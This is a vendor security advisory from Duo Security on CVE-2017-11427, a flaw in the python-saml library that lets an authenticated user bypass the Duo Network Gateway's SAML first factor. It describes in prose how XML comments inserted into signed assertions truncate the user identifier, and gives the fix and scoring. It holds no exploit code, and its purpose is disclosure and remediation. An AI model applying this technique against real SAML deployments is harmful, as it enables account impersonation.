Advisory ID: DUO-PSA-2017-003
Publication Date: 2018-02-27
Revision Date: 2018-02-27
Status: Confirmed, Fixed
Document Revision: 1
Duo Security has identified a security flaw in a third-party library used in the Duo Network Gateway (DNG) which, under certain configurations, could allow for a bypass of the DNG's SAML first factor of authentication.
Duo has discovered an implementation flaw in the open-source library 'python-saml' (CVE-2017-11427) that, under certain conditions, could allow an attacker with authenticated access to a SAML Identity Provider (IdP) to bypass the first factor of authentication for a different user.
This issue is due to an inconsistency of XML DOM traversal APIs and their handling of comment nodes. Comment nodes should have no effect - and indeed, due to the canonicalization of XML prior to signature verification, inserting an XML comment into a SAML message does not invalidate its signature. However, the 'python-saml' code makes incorrect use of a DOM-traversal API, such that it fails to extract the full inner text of an XML element containing a comment. Instead, all the text after the comment is lost.
To exploit this issue, an attacker inserts XML comments into select areas of the SAML assertions before passing them along to the DNG. Once the DNG validates the signature and extracts the user's identifier, only part of the user's identifier is recovered. In cases where an attacker's user identifier (e.g. john_doe) can be truncated to become a victim's user identifier (e.g. john), the attacker can trick the DNG into authenticating as the victim.
Attackers who have the ability to authenticate as a user may be able to bypass the first factor of authentication for a different user.
Note that, unless the attacker can separately bypass 2FA, this attack would not result in a full bypass of user authentication.
This issue affects DNG versions before version 1.2.10. DNG configurations could be at greater risk, due to increased attacker control over the user being bypassed, if they either:
The issue has been resolved through a patch to the Duo Network Gateway. Please update to DNG version 1.2.10+ using the instructions covered at https://duo.com/docs/dng.
You can check the version of your Duo Network Gateway by following the instructions at https://help.duo.com/s/article/4151.
Vulnerability Class: CWE-287: Improper Authentication
Remotely Exploitable: Yes
Authentication Required: Partial
Severity: Medium
CVSSv2 Overall Score: 5.1
CVSSv2 Group Scores: Base: 6.3, Temporal: 5.1, Environmental: 5.1
CVSSv2 Vector: AV:N/AC:M/Au:S/C:C/I:N/A:N/E:POC/RL:U/RC:UC/CDP:ND/TD:ND/CR:M/IR:L/AR:L
Duo Security would like to thank CERT/CC for their coordination related to the various security disclosure actions conducted during this process.
Technical questions regarding this issue should be sent to support@duosecurity.com and reference "DUO-PSA-2017-003" in the subject.
Other feedback regarding this issue can be sent to security@duosecurity.com.